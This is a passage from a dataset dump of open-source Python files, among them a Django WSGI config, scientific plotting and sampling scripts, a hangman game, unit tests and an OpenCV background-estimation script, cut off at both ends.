'\\\\\\\\')\n v2.append(v)\n c = self.__conn.execute(query, values)\n for r in c:\n yield r\n c.close()\n\n def table(self, name):\n return self.__tables[name]\n"},"size":{"kind":"number","value":4232,"string":"4,232"}}},{"rowIdx":843,"cells":{"max_stars_repo_path":{"kind":"string","value":"Dator/dator/wsgi.py"},"max_stars_repo_name":{"kind":"string","value":"treyfortmuller/barc"},"max_stars_count":{"kind":"number","value":191,"string":"191"},"id":{"kind":"string","value":"2024451"},"content":{"kind":"string","value":"\"\"\"\nWSGI config for ruenoor project.\n\nIt exposes the WSGI callable as a module-level variable named ``application``.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/\n\"\"\"\n\nimport os\nimport sys\nfrom django.core.wsgi import get_wsgi_application\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"dator.settings\")\npath = '/home/ubuntu/dator'\nif path not in sys.path:\n sys.path.append(path)\nsys.path.append('/home/ubuntu/dator/dator')\n\nsys.path.append('/home/ubuntu/dist/lib/python2.7/site-packages')\n\napplication = get_wsgi_application()\n"},"size":{"kind":"number","value":588,"string":"588"}}},{"rowIdx":844,"cells":{"max_stars_repo_path":{"kind":"string","value":"plot/plot_spiralwidth.py"},"max_stars_repo_name":{"kind":"string","value":"dh4gan/tache"},"max_stars_count":{"kind":"number","value":5,"string":"5"},"id":{"kind":"string","value":"2024080"},"content":{"kind":"string","value":"# Written 15/1/18 by dh4gan\n# Script reads spiralmembers.dat file from spiralfind\n# Also reads best fit parameters for each arm\n# Then computes distance of particle from arm as a function of radius\n\nimport filefinder as ff\nimport io_tache\nimport io_spiral\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LogNorm\n\nnpoints = 5000\n\nprint 'Select membership file to analyse:'\n\nmemberfile = ff.find_local_input_files('*_spiralmembers.dat')\nispiral = input(\"Which spiral to plot? 
\")\n\n# Determine eigenvalue file name from memberfile name\neigenfile = memberfile[:-18]\n\n# Read spiralmembers file\nprint 'Reading spiral membership in file',memberfile\n\nx,y,z,spiralmember = io_spiral.read_spiralmembership(memberfile)\nprint 'Read ', len(spiralmember), ' elements'\n#print spiralmember\n\n# Read best fits (either .chimin or .fitparams)\nfitparamfile = eigenfile+'_spirals.chimin'\n\nfitdata = np.genfromtxt(fitparamfile,skiprows=2)\n\n# Find fit parameters for selected arm\n\na = fitdata[ispiral-1,2]\nb = fitdata[ispiral-1,3]\nx0 = fitdata[ispiral-1,4]\ny0 = fitdata[ispiral-1,5]\nxsign = fitdata[ispiral-1,7]\nysign = fitdata[ispiral-1,8]\n\n# Find all elements belonging to that arm\n\nimember = spiralmember[:]==ispiral\n\nx = x[imember]\ny = y[imember]\nz = z[imember]\n\nxorigin = 0.0\nyorigin = 0.0\n\nnmember = len(x)\n\nprint 'Found ', nmember, ' members of spiral ', ispiral\n\n# For each element:\n# compute r, sepmin (minimum distance from spiral)\n# save to arrays\n\n#nmember = 1000\nr = np.zeros(nmember)\nt = np.zeros(nmember)\nsepmin = np.zeros(nmember)\nweight = np.zeros(nmember)\n\nfor i in range(nmember):\n\n r[i] = io_spiral.separation(xorigin,yorigin,x[i],y[i])\n t[i], sepmin[i] = io_spiral.find_minimum_t_logspiral(x[i],y[i],a,b,x0,y0,npoints,xsign=xsign,ysign=ysign)\n\n print i,r[i],t[i], sepmin[i]\n\ntmin = np.amin(t)\ntmax = np.amax(t)\n\nweight[:] = 1.0/float(nmember)\n\nprint 'Minimum, maximum r: ', np.amin(r), np.amax(r)\nprint 'Minimum, maximum t: ', tmin, tmax\nprint 'Generating curve: '\nprint a,b,x0,y0,xsign,ysign\n\n\nxspiral, yspiral = io_spiral.generate_logspiral_curve(tmin,tmax,a,b,x0,y0,xsign=xsign,ysign=ysign,npoints=npoints)\n\n\nfig1 = plt.figure()\nax1 = fig1.add_subplot(111)\n#ax2 = fig1.add_subplot(212)\nax1.set_xlabel('R (kpc)',fontsize=22)\nax1.set_ylabel('Spine Distance (kpc)',fontsize=22)\ncounts, xbins,ybins, image = ax1.hist2d(r/10.0,sepmin/10.0,bins=20, range=[[1.0,4.0],[0.0,0.1]],normed=False,cmap='rainbow')\n#plt.colorbar(image,ax=ax1)\n\nmaxcount = counts.max()\n\nprint maxcount, np.median(counts)\n\nclevels = [50,70,90,95]\nclabels = [str(i)+'%' for i in clevels]\nclevels = [np.percentile(counts[np.nonzero(counts)],i) for i in clevels]\n\n\nprint clevels\nprint clabels\n\nCS= ax1.contour(counts.transpose(),extent=[xbins.min(),xbins.max(),ybins.min(),ybins.max()],colors='white',levels=clevels)\n\nfmt={}\nfor l,s in zip(CS.levels,clabels):\n fmt[l]=s\n\nplt.clabel(CS,fontsize=16,fmt=fmt)\n\n#ax1.hist(sepmin[:100])\n#ax2.scatter(x[:100],y[:100])\n#ax2.plot(xspiral,yspiral,color='red')\n\n\nfig2 = plt.figure()\nax2 = fig2.add_subplot(111)\nax2.set_ylabel('Relative Frequency',fontsize=22)\nax2.set_xlabel('Spine Distance (kpc)',fontsize=22)\nax2.hist(sepmin/10.0,bins=50, histtype='step', label='all radii', linewidth=2,normed=True)\n\nsepclose = sepmin[np.logical_and(r[:]>=10.0,r[:]<20.0)]\nsepfar = sepmin[np.logical_and(r[:]>=20.0,r[:]<30.0)]\nax2.hist(sepclose/10.0, histtype = 'step',label = '$1.0 < r < 2.0 $ kpc',linewidth=2,normed=True)\nax2.hist(sepfar/10.0,histtype = 'step',label = '$2.0 < r < 3.0 $ kpc',linewidth=2,normed=True)\n\nax2.legend(loc='upper 
right')\nplt.show()\nfig1.savefig(eigenfile+'spiral_'+str(ispiral)+'width_vs_r.png')\nfig2.savefig(eigenfile+'spiral_'+str(ispiral)+'width1D.png')\n\n"},"size":{"kind":"number","value":3721,"string":"3,721"}}},{"rowIdx":845,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/exceptionite/tabs/RecommendationsTab.py"},"max_stars_repo_name":{"kind":"string","value":"girardinsamuel/exceptionite"},"max_stars_count":{"kind":"number","value":6,"string":"6"},"id":{"kind":"string","value":"2024367"},"content":{"kind":"string","value":"from ..Tab import Tab\nfrom ..blocks.PackagesUpdates import PackagesUpdates\n\n\nclass RecommendationsTab(Tab):\n\n name = \"Recommendations\"\n id = \"recommendations\"\n icon = \"CheckCircleIcon\"\n advertise_content = True\n\n def __init__(self, handler):\n super().__init__(handler)\n self.add_blocks(PackagesUpdates)\n"},"size":{"kind":"number","value":332,"string":"332"}}},{"rowIdx":846,"cells":{"max_stars_repo_path":{"kind":"string","value":"main.py"},"max_stars_repo_name":{"kind":"string","value":"prehensile/knobtwiddler"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2022831"},"content":{"kind":"string","value":"import sys, os\nimport tuning\nimport rtlfm\n\n# main runloop\nrtl = rtlfm.RTLFM()\n#while True:\nfor i in range( 10 ):\n\n # get a tuning\n t = tuning.get_next_tuning()\n\n # sample a bit\n rtl.sample_frequency(\n frequency = t.frequency, \n modulation = t.modulation,\n duration = 5 * 1000\n )\n \n # TODO: detect non-silence\n\n # if not silence\n # TODO: sample more\n # TODO: detect voice\n"},"size":{"kind":"number","value":426,"string":"426"}}},{"rowIdx":847,"cells":{"max_stars_repo_path":{"kind":"string","value":"kino/management/__init__.py"},"max_stars_repo_name":{"kind":"string","value":"DongjunLee/kino-bot"},"max_stars_count":{"kind":"number","value":109,"string":"109"},"id":{"kind":"string","value":"2023160"},"content":{"kind":"string","value":"import inspect\nimport json\n\nfrom ..functions import Functions\nfrom ..utils.data_handler import DataHandler\nfrom ..utils.data_loader import SkillData\nfrom ..utils.data_loader import FeedData\n\n\ndef register_skills():\n skills = inspect.getmembers(Functions, predicate=inspect.isfunction)\n del skills[0] # del __init__\n\n print(\"start register skills\")\n\n skill_dict = {}\n try:\n for k, v in skills:\n parsed_doc = parse_doc(v.__doc__)\n if parsed_doc is None:\n print(f\"{k} skill do not have doc. 
skip thie skill.\")\n continue\n\n parsed_doc[\"params\"] = list(v.__annotations__.keys())\n skill_dict[k] = parsed_doc\n except BaseException as e:\n print(v.__doc__)\n\n data_handler = DataHandler()\n data_handler.write_file(\"skills.json\", skill_dict)\n\n print(f\"kino-bot has **{len(skill_dict)}** skills.\")\n for k, v in skill_dict.items():\n print(\n f\" - {v.get('icon', ':white_small_square: ')}**{k}** : {v.get('description', '')}\"\n )\n\n\ndef parse_doc(doc_string):\n if doc_string is None:\n return None\n\n parsed_doc = {}\n for line in doc_string.splitlines():\n if \":\" in line:\n line = line.strip()\n delimeter_index = line.index(\":\")\n\n key = line[:delimeter_index]\n value = json.loads(line[delimeter_index + 1 :])\n\n parsed_doc[key] = value\n return parsed_doc\n\n\ndef prepare_skill_data():\n print(\"setting skill logs for Skill Predictor ...\")\n SkillData()\n\n\ndef prepare_feed_data():\n print(\"setting feed and pocket logs for Feed Classifier ...\")\n FeedData()\n"},"size":{"kind":"number","value":1666,"string":"1,666"}}},{"rowIdx":848,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/CommunityGAN/sampling.py"},"max_stars_repo_name":{"kind":"string","value":"Bipasha-banerjee/newCGAN"},"max_stars_count":{"kind":"number","value":69,"string":"69"},"id":{"kind":"string","value":"2024094"},"content":{"kind":"string","value":"import numpy as np\nimport multiprocessing\nimport sys\nimport pickle\nimport utils\nimport random\n\n\ndef choice(samples, weight):\n s = np.sum(weight)\n target = random.random() * s\n for si, wi in zip(samples, weight):\n if target < wi:\n return si\n target -= wi\n return si\n\n\nclass Sampling(object):\n def __init__(self):\n super(Sampling, self).__init__()\n self.config = pickle.load(open(sys.argv[1], 'rb'))\n self.id2nid = pickle.load(open(self.config.cache_filename_prefix + '.neighbor.pkl', 'rb'))\n self.total_motifs = pickle.load(open(self.config.cache_filename_prefix + '.motifs.pkl', 'rb'))\n self.theta_g = pickle.load(open(self.config.cache_filename_prefix + '.theta.pkl', 'rb'))\n self.args = pickle.load(open(self.config.cache_filename_prefix + '.args.pkl', 'rb'))\n # print('load data done', datetime.datetime.now())\n\n def run(self):\n cores = self.config.num_threads\n motifs, paths = zip(*multiprocessing.Pool(cores).map(self.g_s, self.args))\n pickle.dump(motifs, open(self.config.cache_filename_prefix + '.motifs_sampled.pkl', 'wb'))\n pickle.dump(paths, open(self.config.cache_filename_prefix + '.paths.pkl', 'wb'))\n\n def g_s(self, args): # for multiprocessing, pass multiple args in one tuple\n root, n_sample, only_neg = args\n motifs = []\n paths = []\n for i in range(2 * n_sample):\n if len(motifs) >= n_sample:\n break\n motif = [root]\n path = [root]\n for j in range(1, self.config.motif_size):\n v, p = self.g_v(motif)\n if v is None:\n break\n motif.append(v)\n path.extend(p)\n if len(set(motif)) < self.config.motif_size:\n continue\n motif = tuple(sorted(motif))\n if only_neg and motif in self.total_motifs:\n continue\n motifs.append(motif)\n paths.append(path)\n return motifs, paths\n\n def g_v(self, roots):\n g_v_v = self.theta_g[roots[0]].copy()\n for nid in roots[1:]:\n g_v_v *= self.theta_g[nid]\n current_node = roots[-1]\n previous_nodes = set()\n path = []\n is_root = True\n while True:\n if is_root:\n node_neighbor = list({neighbor for root in roots for neighbor in self.id2nid[root]})\n else:\n node_neighbor = self.id2nid[current_node]\n if len(node_neighbor) == 0: # the root node has no neighbor\n return None, 
None\n if is_root:\n tmp_g = g_v_v\n else:\n tmp_g = g_v_v * self.theta_g[current_node]\n relevance_probability = np.sum(self.theta_g[node_neighbor] * tmp_g, axis=1)\n relevance_probability = utils.agm(relevance_probability)\n next_node = choice(node_neighbor, relevance_probability) # select next node\n if next_node in previous_nodes: # terminating condition\n break\n previous_nodes.add(current_node)\n current_node = next_node\n path.append(current_node)\n is_root = False\n return current_node, path\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print('Usage: python sampling.py config.pkl')\n s = Sampling()\n s.run()\n"},"size":{"kind":"number","value":3424,"string":"3,424"}}},{"rowIdx":849,"cells":{"max_stars_repo_path":{"kind":"string","value":"tadataka/dataset/__init__.py"},"max_stars_repo_name":{"kind":"string","value":"IshitaTakeshi/Tadataka"},"max_stars_count":{"kind":"number","value":54,"string":"54"},"id":{"kind":"string","value":"2024311"},"content":{"kind":"string","value":"from tadataka.dataset.tum_rgbd import TumRgbdDataset\nfrom tadataka.dataset.new_tsukuba import NewTsukubaDataset\nfrom tadataka.dataset.euroc import EurocDataset\n"},"size":{"kind":"number","value":160,"string":"160"}}},{"rowIdx":850,"cells":{"max_stars_repo_path":{"kind":"string","value":"GRE Hangman/gameplay.py"},"max_stars_repo_name":{"kind":"string","value":"ntdai95/Personal-Projects"},"max_stars_count":{"kind":"number","value":3,"string":"3"},"id":{"kind":"string","value":"2024111"},"content":{"kind":"string","value":"# Importing the colored function for user-friendly display\nfrom termcolor import colored\n\nclass LetterPlacer:\n def placing_letter_in_word(self, chosen_letter, list_secret_word, list_current_position):\n \"\"\"Placing the user's guessed letter into the corresponding position among the list of list_current_position and then convert\n it to a string to print out to the user the location of his/her choice of guessed letters\"\"\"\n # Creating an empty list for the indexes where the user's guessed letter is located\n indexes = []\n # Adding the indexes to the list of indexes where the user's guessed letter is located\n for index, letter in enumerate(list_secret_word):\n if letter == chosen_letter:\n indexes.append(index)\n # Change the \"_\" characters with the user's guessed letter based on its location in the secret word\n for index in indexes:\n list_current_position[index] = chosen_letter\n # Creating an empty string to display the location of the guessed letter for the user\n string_current_position = \"\"\n # Adding up the \"_\" characters with the correctly guessed letters as a string to display to the user\n for index in list_current_position:\n string_current_position = string_current_position + \" \" + index\n # Print out the location of the guessed letter to the user\n print(f\"{chosen_letter} is in the word{string_current_position}.\")\n # Return the updated list of list_current_position with the added guessed letter\n return list_current_position\n\nclass GuessedWordChecker:\n def guess_word_input_validator(self):\n \"\"\"Asking and checking the user's guessed word\"\"\"\n # Create a while loop to keep asking for a valid guessed word from the user\n while True:\n # Asking the user for the guessed word, allowing the mix of uppercased and lowercased letters. Need to be upeercased the \n # user input, so that it can match with the uppercased secret word.\n guessed_word = input(\"\\nTry and guess the word? 
\").upper()\n # If the user's guessed word is valid, then return it.\n if guessed_word.isalpha() == True:\n return guessed_word\n # If the user's guessed word is not valid (the guessed word contains non-alphabetical characters such as numbers of symbols,\n # @, !, etc.), then display the warning message and go back and ask the new guessed word again.\n else:\n print(\"Please, guess a real word with alphabetical letters only.\")\n\n def guessed_word_is_secret_word(self, guessed_word, secret_word, wrong_guess):\n \"\"\"Decides if the user's guessed word is the same as the secret word\"\"\"\n # If the user's guessed word is the same as the secret word, then return the user's guessed word, which will be the same as the \n # secret word\n if guessed_word == secret_word:\n return guessed_word\n # If the user's guessed word is not the same as the secret word, then print out the warning message and return the guessed word\n # as an empty string\n else:\n guessed_word = \"\"\n print(f\"That is not the word.\\nYou still have {wrong_guess} guesses remaining.\")\n return guessed_word\n\nclass LetterChecker:\n def letter_validator(self, chosen_letter, guessed_letters):\n \"\"\"Checking if the user's entered letter is valid or not\"\"\"\n # Check if the user enters an alphabetical letter or not\n if chosen_letter.isalpha() == False:\n print(\"Please, enter an alphabetical letter only!\")\n # Check if the user enters only 1 letter or not\n elif len(list(chosen_letter)) != 1:\n print(\"Please, enter one letter only!\")\n # Check if the guessed letter has already been guessed before\n elif chosen_letter in guessed_letters:\n print(\"You already guessed this letter. Please, choose another letter.\")\n # If there is no issue with the guessed letter, then return the following message\n else:\n return \"Good letter\"\n\n def chosen_letter_in_list_secret_word(self, chosen_letter, wrong_guess, list_secret_word, list_current_position, secret_word, guessed_word):\n \"\"\"Checking if the user's chosen letter is among the list of letters of the secret word\"\"\"\n # Checking if user input of letter is in the secret word\n if chosen_letter in list_secret_word:\n # If the chosen letter is in the list of letters of secret word, then place that guessed letter in to its appropriate\n # position(s) in the list of letters of secret word with the function of\n # placing_letter_in_word()\n instance_of_LetterPlacer = LetterPlacer()\n list_current_position = instance_of_LetterPlacer.placing_letter_in_word(chosen_letter, list_secret_word, list_current_position)\n # If the user find out all of the letters in the secret word, then there is no point to keep asking him again to guess the \n # secret word\n if \"_\" not in list_current_position:\n return wrong_guess, list_current_position, secret_word\n else:\n instance_of_GuessedWordChecker = GuessedWordChecker()\n # Ask the user to enter his/her's guess for the secret word and check if it is valid\n guessed_word = instance_of_GuessedWordChecker.guess_word_input_validator()\n # Replacing the guessed word with the secret word if the user correctly guessed the word with the function of\n # guessed_word_is_secret_word()\n guessed_word = instance_of_GuessedWordChecker.guessed_word_is_secret_word(guessed_word, secret_word, wrong_guess)\n # If the word is not in the secret word, then decrease the number of guesses remaining by 1 and print out how many guess remains\n # for the user\n else:\n wrong_guess -=1\n print(f\"{chosen_letter} is not in the word.\\nYou have {wrong_guess} guesses 
remaining.\")\n # Return the updated wrong_guess, list_current_position, guessed_word variables\n return wrong_guess, list_current_position, guessed_word\n\nclass Gameplay:\n def gameplay(self, secret_word, definition_secret_word, list_current_position, list_secret_word, wrong_guess, guessed_letters):\n \"\"\"Deciding if the user correctly guessed the word or not\"\"\"\n # Creating a while loop to let the user guessed the letters until he/she runs out of guesses remainng\n while wrong_guess != 0:\n # Displaying the definition and the current position of guessed letters in the secret word\n print(colored(f\"\\nDefinition: {definition_secret_word}\", \"cyan\"))\n string_current_position = \"\"\n for character in list_current_position:\n string_current_position += character + \" \"\n print(colored(f\"Word: {string_current_position[:-1]}\\n\", \"cyan\"))\n # Asking the user for a letter, allowing either an uppercased or lowercased letter. Need to be uppercased the user input so \n # that it can match the list of uppercased letters from the list of list_secret_word\n chosen_letter = input(\"Guess a letter? \").upper()\n # Checking, if the letter is valid with the letter_validator() function\n instance_of_LetterChecker = LetterChecker()\n letter_validity = instance_of_LetterChecker.letter_validator(chosen_letter, guessed_letters)\n # Creating an empty string of guessed word, which will be the secret word if the user guesses it correctly and empty string\n # otherwise\n guessed_word = \"\"\n # If the user input letter is valid, then move on, otherwise go back and ask a new letter again\n if letter_validity == \"Good letter\":\n # Adding the user entered valid letter to the lsit of guessed_letters to later check if the user is guessing the same \n # letter again\n guessed_letters.append(chosen_letter)\n # Checking if the user's guessed letter is among the list of letters of the secret word with the function of\n # chosen_letter_in_list_secret_word(). 
Then, return the number of wrong guesses remaining, the\n # list of list_current_position (to display the current standing to the user), and the guessed_word as a secret word if \n # the user guesses the word correctly after the guessing correctly the letter is among the letters of the secret word\n wrong_guess, list_current_position, guessed_word = instance_of_LetterChecker.chosen_letter_in_list_secret_word(chosen_letter, wrong_guess, list_secret_word, list_current_position, secret_word, guessed_word)\n # If the user guessed the secret word correctly, then return the guessed word as a secret word\n if guessed_word == secret_word:\n return guessed_word\n # If the user did not guessed the secret word correctly and runs out of guesses, then return the guessed word as an empty string\n else:\n return guessed_word"},"size":{"kind":"number","value":9282,"string":"9,282"}}},{"rowIdx":851,"cells":{"max_stars_repo_path":{"kind":"string","value":"tests/test_perl_side_proxy.py"},"max_stars_repo_name":{"kind":"string","value":"yacchi21/PyPerl5"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024379"},"content":{"kind":"string","value":"# -*- coding:utf8 -*-\nfrom __future__ import division, print_function, unicode_literals\n\nimport unittest\n\nimport perl5\n\n\nclass ProxyTestObject(object):\n def __init__(self, attr1):\n self._attr1 = attr1\n\n def attr1(self, data=None):\n if data is None:\n return self._attr1\n self._attr1 = data\n\n\ndef proxy_test_func(arg):\n return arg\n\n\nSCRIPT = r\"\"\"\nuse PyPerl5::Proxy qw/ py_get_object /;\nuse PyPerl5::Boolean qw/ true false /;\nsub unit_test {\n my $ut = shift;\n \n $ut->assertTrue(1);\n $ut->assertFalse(0);\n \n $ut->assertTrue(true);\n $ut->assertFalse(false);\n \n $ut->assertEqual([1, true], [1, true]);\n}\n\nsub unit_test2 {\n my $ut = shift;\n my $class = py_get_object(\"tests.test_perl_side_proxy.ProxyTestObject\");\n $ut->assertTrue($class->isa(\"PyPerl5::Proxy\"));\n \n my $o = $class->new(\"TEST\");\n $ut->assertEqual(\"TEST\", $o->attr1);\n $o->attr1(\"TEST2\");\n $ut->assertEqual(\"TEST2\", $o->attr1);\n}\n\nsub unit_test3 {\n my $ut = shift;\n my $f = py_get_object(\"tests.test_perl_side_proxy.proxy_test_func\");\n my $ret = $f->(\"call\");\n $ut->assertEqual(\"call\", $ret); \n}\n\"\"\"\n\n\nclass TestCase(unittest.TestCase):\n vm = None\n\n def setUp(self):\n self.vm = vm = perl5.VM()\n vm.eval(SCRIPT)\n\n def tearDown(self):\n self.vm.close()\n\n def test_object_proxy(self):\n self.vm.call(\"unit_test\", self)\n\n def test_py_get_object(self):\n self.vm.call(\"unit_test2\", self)\n\n def test_function_exec(self):\n self.vm.call(\"unit_test3\", self)\n\n\nif __name__ == '__main__':\n unittest.main()\n"},"size":{"kind":"number","value":1618,"string":"1,618"}}},{"rowIdx":852,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/utils/__init__.py"},"max_stars_repo_name":{"kind":"string","value":"amiiiirrrr/TensorRT_keras_model"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2024204"},"content":{"kind":"string","value":"#coding: utf-8\nfrom utils.callbacks import CallbackForSegmentation\nfrom utils.imagegen import CroppedImageDataGenerator, get_datagen\nfrom utils.misc import 
*"},"size":{"kind":"number","value":157,"string":"157"}}},{"rowIdx":853,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/icp/apps/beekeepers/migrations/0005_aprilsurvey.py"},"max_stars_repo_name":{"kind":"string","value":"project-icp/bee-pollinator-app"},"max_stars_count":{"kind":"number","value":6,"string":"6"},"id":{"kind":"string","value":"2023180"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('beekeepers', '0004_survey_unique_together'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='AprilSurvey',\n fields=[\n ('survey', models.OneToOneField(related_name='april', primary_key=True, serialize=False, to='beekeepers.Survey')),\n ('colony_loss_reason', models.TextField(help_text='The most likely causes for colony loss')),\n ],\n ),\n ]\n"},"size":{"kind":"number","value":608,"string":"608"}}},{"rowIdx":854,"cells":{"max_stars_repo_path":{"kind":"string","value":"dash_berkay/urls.py"},"max_stars_repo_name":{"kind":"string","value":"efebuyuk/jd_intern_project"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2024588"},"content":{"kind":"string","value":"from django.urls import path\nfrom . import views\nfrom django.conf.urls import url\n\n\nurlpatterns = [\n path('', views.startapp),\n]"},"size":{"kind":"number","value":131,"string":"131"}}},{"rowIdx":855,"cells":{"max_stars_repo_path":{"kind":"string","value":"transaction/tests/models/test_user_tag.py"},"max_stars_repo_name":{"kind":"string","value":"Arthuchaut/sagittarius_project"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024067"},"content":{"kind":"string","value":"import pytest\nfrom user.models import User\nfrom transaction.models import UserTag\n\n\nclass TestUserTag:\n '''The UserTag model test class.\n '''\n\n @pytest.mark.django_db(transaction=True)\n @pytest.mark.parametrize(\n 'name, icon', [\n ('foo', None),\n ('bar', 'baz'),\n pytest.param(None, 'baz', marks=pytest.mark.xfail),\n ]\n )\n def test_create(self, lambda_user: User, name: str, icon: str) -> None:\n '''Test the user_tag creation.\n '''\n\n user_tag: UserTag = UserTag.objects.create(\n name=name, icon=icon, user=lambda_user\n )\n assert user_tag"},"size":{"kind":"number","value":647,"string":"647"}}},{"rowIdx":856,"cells":{"max_stars_repo_path":{"kind":"string","value":"niaaml/fitness/utility.py"},"max_stars_repo_name":{"kind":"string","value":"musicinmybrain/NiaAML"},"max_stars_count":{"kind":"number","value":22,"string":"22"},"id":{"kind":"string","value":"2024406"},"content":{"kind":"string","value":"from niaaml.utilities import Factory\nfrom niaaml.fitness.accuracy import Accuracy\nfrom niaaml.fitness.cohen_kappa import CohenKappa\nfrom niaaml.fitness.precision import Precision\nfrom niaaml.fitness.f1 import F1\n\n__all__ = [\"FitnessFactory\"]\n\n\nclass FitnessFactory(Factory):\n r\"\"\"Class with string mappings to fitness class.\n\n Attributes:\n _entities (Dict[str, Fitness]): Mapping from strings to fitness classes.\n\n See Also:\n * :class:`niaaml.utilities.Factory`\n \"\"\"\n\n def _set_parameters(self, **kwargs):\n r\"\"\"Set the parameters/arguments of the factory.\"\"\"\n self._entities = {\n \"Accuracy\": Accuracy,\n \"Precision\": Precision,\n \"CohenKappa\": CohenKappa,\n \"F1\": F1,\n 
}\n"},"size":{"kind":"number","value":762,"string":"762"}}},{"rowIdx":857,"cells":{"max_stars_repo_path":{"kind":"string","value":"backend/posts/migrations/0002_remove_post_tags.py"},"max_stars_repo_name":{"kind":"string","value":"a-samir97/medium-clone"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024202"},"content":{"kind":"string","value":"# Generated by Django 3.1.3 on 2020-11-21 09:49\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('posts', '0001_initial'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='post',\n name='tags',\n ),\n ]\n"},"size":{"kind":"number","value":311,"string":"311"}}},{"rowIdx":858,"cells":{"max_stars_repo_path":{"kind":"string","value":"tools/modules/TREX/core/__init__.py"},"max_stars_repo_name":{"kind":"string","value":"automenta/trex-autonomy"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024063"},"content":{"kind":"string","value":"\n# Import TREX analog classes\nfrom TREX.core.db_core import DbCore,Timeline\nfrom TREX.core.assembly import Assembly,Entity,Rule,Token,Slot,Variable\n\n# Import \nfrom TREX.core.token_network import TokenNetwork\nfrom TREX.core.token_network_filter import TokenNetworkFilter\n"},"size":{"kind":"number","value":270,"string":"270"}}},{"rowIdx":859,"cells":{"max_stars_repo_path":{"kind":"string","value":"tests/chainer_tests/functions_tests/pooling_tests/pooling_nd_helper.py"},"max_stars_repo_name":{"kind":"string","value":"zjzh/chainer"},"max_stars_count":{"kind":"number","value":3705,"string":"3,705"},"id":{"kind":"string","value":"2024168"},"content":{"kind":"string","value":"import itertools\n\nimport numpy\nimport six\n\nfrom chainer import testing\nimport chainer.utils\n\n\ndef pooling_patches(dims, ksize, stride, pad, cover_all):\n \"\"\"Return tuples of slices that indicate pooling patches.\"\"\"\n # Left-top indexes of each pooling patch.\n if cover_all:\n xss = itertools.product(\n *[six.moves.range(-p, d + p - k + s, s)\n for (d, k, s, p) in six.moves.zip(dims, ksize, stride, pad)])\n else:\n xss = itertools.product(\n *[six.moves.range(-p, d + p - k + 1, s)\n for (d, k, s, p) in six.moves.zip(dims, ksize, stride, pad)])\n # Tuples of slices for pooling patches.\n return [tuple(slice(max(x, 0), min(x + k, d))\n for (x, d, k) in six.moves.zip(xs, dims, ksize))\n for xs in xss]\n\n\ndef shuffled_linspace(shape, dtype):\n size = chainer.utils.size_of_shape(shape)\n x = numpy.random.permutation(size) + numpy.random.uniform(0.3, 0.7, size)\n x = (2 * x / max(1, size) - 1).astype(dtype)\n return x.reshape(shape)\n\n\ntesting.run_module(__name__, __file__)\n"},"size":{"kind":"number","value":1082,"string":"1,082"}}},{"rowIdx":860,"cells":{"max_stars_repo_path":{"kind":"string","value":"tensortools/optimize/__init__.py"},"max_stars_repo_name":{"kind":"string","value":"klmcguir/tensortools"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2023168"},"content":{"kind":"string","value":"\"\"\"\nOptimization routines for CP decompositions\n\"\"\"\n\nfrom .optim_utils import FitResult\nfrom .cp_als import cp_als\nfrom .mcp_als import mcp_als\nfrom .ncp_hals import ncp_hals\nfrom .ncp_bcd import ncp_bcd\nfrom .mncp_hals import 
mncp_hals\n"},"size":{"kind":"number","value":237,"string":"237"}}},{"rowIdx":861,"cells":{"max_stars_repo_path":{"kind":"string","value":"Python/BGEstimation.py"},"max_stars_repo_name":{"kind":"string","value":"Prasheel24/background-estimation"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2022696"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n\"\"\"Background Estimation with Median Filtering\"\"\"\n\n__name__ = \"BGEstimation\"\n__version__ = (1,0)\n__author__ = \" <>\"\n\n_generator_name = __name__ + \"-\" + \".\".join(map(str, __version__))\n\n\n# Import the required libraries\nimport numpy as np\nimport sys, os\ntry:\n sys.path.remove('/opt/ros/kinetic/lib/python2.7/dist-packages')\nexcept:\n pass\nimport cv2 \nfrom skimage import data, filters\n\n# Capture the Video for Background Estimation in VideoCapture object\ncaptured_video = cv2.VideoCapture('MorganBridgeFeed.mp4')\n\n# Select 25 frames from the captured_video at Random\n# CAP_PROP_FRAME_COUNT returns the frame count from the video file\n# Product with np.random.uniform with specified size gives\n# Random frames from the video of type ndarray\nframe_ids = captured_video.get(cv2.CAP_PROP_FRAME_COUNT) * np.random.uniform(size=20)\n\n# Store the frames in an empty array(list)\ntemp_frames = []\n\n# Loop through to get each frame with its corresponding id\nfor frame_id in frame_ids:\n\t# mark each frame on videocapture object\n\tcaptured_video.set(cv2.CAP_PROP_POS_FRAMES, frame_id)\n\t# get each frame\n\tret_val, individual_frame = captured_video.read()\n\t# append into temporary list\n\ttemp_frames.append(individual_frame)\n# print(ret_val)\n\n# Now we calculate the median along the time axis\nmedian_frame = np.median(temp_frames, axis=0).astype(dtype=np.uint8)\n\n# Display the median frame thus calculated\ncv2.imshow('Median Frame', median_frame)\ncv2.waitKey(0)\n# cv2.imwrite('median_frame.jpg',median_frame)\n\n\n\n# Now we create a mask for every frame\n# Reset previously set frame number to 0\ncaptured_video.set(cv2.CAP_PROP_POS_FRAMES, 0)\n\n# 